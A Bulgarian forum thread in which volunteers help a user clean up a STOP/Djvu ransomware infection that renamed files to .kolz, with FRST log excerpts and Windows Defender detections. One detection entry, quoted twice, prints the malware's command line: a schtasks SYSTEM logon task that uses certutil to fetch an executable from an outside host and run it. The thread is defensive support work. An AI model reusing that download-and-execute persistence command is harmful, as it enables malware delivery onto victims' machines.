Премини към съдържанието
  • Добре дошли!

    Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

    Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

     

Препоръчан отговор


Хвана ме много лошо този вирус как да го премахна, много сте готини от Калдата Благодаря ви ! 

Линк към този отговор
Сподели в други сайтове

Следваш стъпките от тази тема и чакаш търпеливо някой от специлистите да даде точни инструкции. Не се опитвай сам да решиш проблема, защото така затрудняваш персонала.

https://www.kaldata.com/forums/topic/132819-системата-ми-е-инфектирана-какво-да-правя-сега/

Линк към този отговор
Сподели в други сайтове

А ти прочете ли каквои е написал @Eclipse2G?
Видя ли инструкциите, написани от вирусоборец и по кото работят специалистите, обслужващи раздела?

Линк към този отговор
Сподели в други сайтове

Не четеш другарю Седларов, това е раздел за помощ в борбата срещу вирусите, специалистите в областта НЕ СА ясновидци, а в повечето случаи се налага да пишат код който е специално за съответната машина и може да бъде вреден за всяка друга.
Как точно предлагаш да ти се помогне при това положение?

Виж горе линка дето ти го е дал колегата и следвай стъпките, ако ли не : https://sanovnik.bg/forum/f-50-yasnovidstvo


Линк към този отговор
Сподели в други сайтове

Ето начини за премахване: https://www.google.bg/search?q=Kolz+вирус&hl=bg

И от първия резултат, евентуално може да пробваш decryptor, но е малко вероятно да можеш да си възстановиш информацията: https://howtofix.guide/kolz-virus/

Ако нямаш архив, най-вероятно ще я загубиш.

 

Линк към този отговор
Сподели в други сайтове
  • Решение

Бас ловя, че това е поредното разширение на STOP Djvu Ransomware. Декриптор за новите варианти няма (особено ако същите използват онлайн ключ за криптиране, вместо офлайн такъв). Премахването на заразата обикновено е лесна задача, но е добре да почнете да се настройвате психически, че ако нямате бекъп на различни външни носители с данните ви е свършено малко или много.

Линк към този отговор
Сподели в други сайтове

Здравейте,

Утре ще напиша скрипт за почистване. Има остатъци, които е добре да премахнем:

Цитат

 

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\Run: [keghwoka] => "C:\Users\HP xw4600\gibmtbpf.exe"

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\StartupApproved\Run: => "keghwoka"

2020-09-22 13:49 - 2020-09-22 13:55 - 000000000 ____D C:\Users\HP xw4600\AppData\LocalLow\IGDump
2020-09-22 13:42 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\cwj0pon50yl
2020-09-22 13:38 - 2020-09-22 13:38 - 000001111 _____ C:\Users\HP xw4600\_readme.txt
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\xrpMCARCr4
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\exuieaoEiI
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\JBdT3hVOfo
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\aMeAjSWfch
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\ZMrF6cI6NX
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\8DYdD3ojxS
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\x3CF3EDNhm
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\bbSqWy6yhK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\zdGc81tBDK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\gxIX4a2dRE
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\IDCdJOyapn
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\3soLBPh71Y
2020-09-22 13:36 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f
2020-09-22 13:36 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5
2020-09-22 13:36 - 2020-09-22 13:43 - 012384590 _____ C:\Users\HP xw4600\gibmtbpf.exe.kolz
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\t5v5u9q3q6u5y1s1
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\HVG53LKK6HBIDYVX56WB2MUPW
2020-09-22 13:36 - 2020-09-22 13:36 - 000916735 _____ (SQLite Development Team) C:\Users\HP xw4600\AppData\LocalLow\sqlite3.dll
2020-09-22 13:36 - 2020-09-22 13:36 - 000000555 _____ C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt
2020-09-22 13:36 - 2020-09-22 13:36 - 000000000 ____D C:\SystemID
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ___HD C:\WINDOWS\rss
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\ibkccjksq22
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files\L8P5QHJ8VR
2020-09-22 13:35 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\ScrSnap
2020-09-22 13:34 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files (x86)\PAOw
2019-12-07 12:08 - 2019-12-07 12:08 - 000320202 ___SH () C:\Users\HP xw4600\AppData\Roaming\cwieerh

Error: (09/22/2020 02:04:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Faulting module name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Exception code: 0xc0000005
Fault offset: 0x0137488a
Faulting process id: 0x9a8
Faulting application start time: 0x01d690cd112bd8f4
Faulting application path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Faulting module path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Report Id: 4c02a9df-55d8-4bd5-b90a-24351d17a141
Faulting package full name:
Faulting package-relative application ID:

Windows Defender:
===================================
Date: 2020-09-22 13:38:07.6700000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bulta!rfn&threatid=2147694403&enterprise=0
Name: Trojan:Win32/Bulta!rfn
ID: 2147694403
Severity: Severe
Category: Trojan
Path: process:_pid:8044,ProcessStart:132452445989568289
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F99.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:19.8330000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba&threatid=2147718257&enterprise=0
Name: Trojan:Win32/Glupteba
ID: 2147718257
Severity: Severe
Category: Trojan
Path: process:_pid:1980,ProcessStart:132452445830796454
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:17.0260000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:11.3390000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fareit.V!MTB&threatid=2147743811&enterprise=0
Name: Trojan:Win32/Fareit.V!MTB
ID: 2147743811
Severity: Severe
Category: Trojan
Path: file:_C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5\updatewin2.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Съдейки по следния файл обаче:

C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt

става ясно, че става въпрос за STOP DJVU Ransomware.

Линк към този отговор
Сподели в други сайтове
преди 12 часа, B-boy/StyLe/ написа:

Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F

Сори за офтопика ама не се сдържах :D  Как хубаво ползва LOL's ...

Линк към този отговор
Сподели в други сайтове

Искам само да попитам автора как се е заразил с това.

Линк към този отговор
Сподели в други сайтове

Какво стана със скрипта? Заразих се като свалих и инсталирах една програма която се оказа вирус ама вече късно. Слагат имена на известни програми на инсталиращите пакети и веднъж пуснеш ли я,край.

Линк към този отговор
Сподели в други сайтове

Ами забавих се, защото имах лични ангажименти. Все пак форума ми е само хоби.

 

Изтеглете fixlist.txt и го запазете в папката, където сте свалили FRST64.exe (на десктопа)

Стартирайте FRST64.exe и натиснете бутона Fix веднъж!

След като приключи, ако ви поиска рестарт - съгласете се. След рестарта публикувайте лог файла - Fixlog.txt, който ще се създаде след работата на програмата.

Внимание: Скрипта е създаден за текущата система. Да не се ползва за други системи с подобни проблеми!

Това е засега.

Поздрави!

Линк към този отговор
Сподели в други сайтове

Вички фаилове на компютърът ми завършват със .kolz и са блокирани,немогат да се отворят.

Fixlog.txt

Линк към този отговор
Сподели в други сайтове

Ами за тях няма какво да се направи. Както казах, криптираните файлове не можем да ги възстановим, а само да ги изтрием. Можем само да почистим заразата, както и направихме. Не вярвам авторите на криптиращия вирус да са включили системни файлове да бъдат криптирани, защото това би сринало работата на Windows, а те нямат файда от това, защото ако жертвата реши да си плати откупа няма да успее. Но ако има такива файлове, то тогава може би по-лесно би било да форматирате и преинсталирате. И в двата случая няма да си върнете файловете и ще се отървете от заразата, но поне след преинсталацията системата ви ще работи нормално (ако сега ви създава проблеми). Изборът оставям на вас. Само ме информирайте за да знам дали да продължаваме с почистващия процес.

Линк към този отговор
Сподели в други сайтове

Между другото прикачения Fixlog.txt не върши особена работа, защото сте стартирали скрипта два пъти и първия Fixlog.txt се е презаписал и затова в новия лог показва, че търсените елементи не са били намерени.

Ran by HP xw4600 (24-09-2020 08:19:51) Run:2

Иначе ако решите да изтриете файловете с разширението *.kolz стартирайте следния bat файл с десен бутон и Run as administrators

del.bat

Линк към този отговор
Сподели в други сайтове

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.
Бележка: Вашата публикация изисква одобрение от модератор, преди да стане видима за всички.

Гост
Напишете отговор в тази тема...

×   Вмъкнахте текст, който съдържа форматиране.   Премахни форматирането на текста

  Разрешени са само 75 емотикони.

×   Съдържанието от линка беше вградено автоматично.   Премахни съдържанието и покажи само линк

×   Съдържанието, което сте написали преди беше възстановено..   Изтрий всичко

×   You cannot paste images directly. Upload or insert images from URL.

  • Разглеждащи това в момента   0 потребители

    Няма регистрирани потребители разглеждащи тази страница.

  • Подобни теми

    • от the guest
      Здравейте,

      От прикачен файл се заразих с .....ISO вариант на MSIL/Kryptik.XVV......., в началото Есет
      не можеше да го изчисти, сега мисля че, успях. Може ли да хвърлите един поглед?

      Предварително Благодаря
      Addition.txt FRST.txt
    • от мирослав24
      MBAM откри и карантинира две нежелани програми и един ключ в регистъра след планово сканиране .Не виждам някакви проблеми с компютъра,освен че е по-бавен от няколко дни.Трябва ли да правя допълнителни сканирания с FRST или това че ги е карантинирала е достатъчно ?Прилагам лога от MBAM
       
      Malwarebytes
      www.malwarebytes.com
      -Log Details-
      Scan Date: 8/19/20
      Scan Time: 11:56 AM
      Log File: e061e561-e1f9-11ea-9e71-001966873225.json
      -Software Information-
      Version: 4.1.0.56
      Components Version: 1.0.1003
      Update Package Version: 1.0.28709
      License: Free
      -System Information-
      OS: Windows 7 Service Pack 1
      CPU: x64
      File System: NTFS
      User: System
      -Scan Summary-
      Scan Type: Threat Scan
      Scan Initiated By: Scheduler
      Result: Completed
      Objects Scanned: 285140
      Threats Detected: 3
      Threats Quarantined: 3
      Time Elapsed: 1 hr, 13 min, 25 sec
      -Scan Options-
      Memory: Enabled
      Startup: Enabled
      Filesystem: Enabled
      Archives: Enabled
      Rootkits: Enabled
      Heuristics: Enabled
      PUP: Detect
      PUM: Detect
      -Scan Details-
      Process: 0
      (No malicious items detected)
      Module: 0
      (No malicious items detected)
      Registry Key: 1
      PUP.Optional.InstallCore, HKU\S-1-5-21-3677490310-1812953499-2719145278-1001\SOFTWARE\CSASTATS\ic, Quarantined, 506, 586068, 1.0.28709, , ame, , , 
      Registry Value: 0
      (No malicious items detected)
      Registry Data: 0
      (No malicious items detected)
      Data Stream: 0
      (No malicious items detected)
      Folder: 0
      (No malicious items detected)
      File: 2
      PUP.Optional.BundleInstaller, C:\$RECYCLE.BIN\S-1-5-21-3677490310-1812953499-2719145278-1003\$RG4RP68.EXE, Quarantined, 515, 790622, 1.0.28709, , ame, , 6382E83EE8373F7EB320C4AB6916C9DC, 368181A26642FD05727AB1CC77D0C242E9F510186028BEFA90F6ABD9A7258632
      Adware.InstallCore, C:\$RECYCLE.BIN\S-1-5-21-3677490310-1812953499-2719145278-1003\$RNNSFPX.EXE, Quarantined, 507, 834715, 1.0.28709, 78E27A9C1798BDE7A312E379, dds, 00858674, 528826720AFA7DF828FFDFBBAB428E67, 08D4DB2268E913E7DDBCF6C447EE3FF3A71AF764E321E1E80B951764EE4588AE
      Physical Sector: 0
      (No malicious items detected)
      WMI: 0
      (No malicious items detected)

      (end)
    • от heat_bg
      Хванах някакъв вирус и всички снимки и клипове станаха с разширение mado.
      И в момента не могат да се отворят.
      Сканирах PC  с Kaspersky ,Malwarebytes,Anti-spyware и няма оправия.
      Pc-то се оправи но не и снимките и видето.
    • от Jordan890
      Здравейте. Моля за помощ. Когато си включа компютъра, браузърът ми под подразбиране Opera се включва автоматично и ми отваря таб, който автоматично ме води към сайтове за хазартни игри. Аваст не откри нищо, деинсталирах го и инсталирах Bitdefender, който също не откри нищо. Как мога да се справя с проблема ? 
      П.п. това се случи след като изтеглих и инсталирах приложение, което бе препоръчано тук, а именно https://www.kaldata.com/софтуер/adsfix-261716.html AdsFix 7.123.20.1
      Тази тема е продължение на 
       
      Прикачвам файлове от FRST с молба за съдействие. Благодаря! 
      1.txt 2.txt 3.txt
    • от k19_russia
      Здравейте!
      Днес реших да пробвам така наречената програма ProtonVPN. Всичко беше добре докато не реших да се дисконектна и изключих VPN-a. След това се оказа, че нямам интернет достъп. В браузърите Chrome и MS edge не успявам да зареждам сайтове. На команда ping google.bg няма отговор. Единственото което работи е cloud клиента, с който се свързвам отдалечено до работното ми място. Следователно си мисля, че имам някакъв достъп до глобалната система и нещо ми пречи да го осъществямам с другите ми приложения на PC. 
      Опитах се да проверя на адаптера на WIFI да взима автоматично настройките от рутера. Всичко е на автоматично. Гледам, че програмата protonVPN е създала виртуален мрежови адаптер, който се изключва при дисконект на програмта от сърварите и след това оставам само на wifi адаптера. 
      Когато отново се свържа чрез protonvpn към някой от сърварите internet достъпът ми се възстановява и отново мога да достъпя интернет сайтовето които ползвам.

      Предисторита на горното, е че на другията дял на същият комп имах WINDOWS който ползвах само него и опитах да ползвам версия на VPN програма която беше кракната. Успях да инсталирам програмата, но антивирусната полудя и съответно изтри някои неща в резултат на което нямах интернет достъп, но имах ping към сървъра на google.com. Резултата не се промени и след деинсталиране на дадената програма. 

      Някой има ли идея какво мога да проверя и да реша проблема си и да имам досъп до интернет и при изкл. protonVPN 
  • Дарение

×
×
  • Добави ново...

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите Условия за ползване